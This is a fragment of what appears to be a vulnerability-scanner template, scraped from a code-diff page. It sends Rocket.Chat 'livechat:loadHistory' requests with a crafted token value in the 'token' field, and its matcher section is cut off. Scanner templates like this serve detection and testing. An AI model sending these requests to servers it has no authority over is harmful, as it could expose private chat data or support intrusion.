Origin: {{BaseURL}}
|
||||
Content-Type: application/json
|
||||
|
||||
{"message":"{\"msg\":\"method\",\"method\":\"livechat:loadHistory\",\"params\":[{\"token\":\"cvenucleirocketchat\",\"rid\":\"GENERAL\"}],\"msg\":\"123\"}"}
|
||||
{"message":"{\"msg\":\"method\",\"method\":\"livechat:loadHistory\",\"params\":[{\"token\":\"{{value}}\",\"rid\":\"GENERAL\"}],\"msg\":\"123\"}"}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
Loading…
Reference in New Issue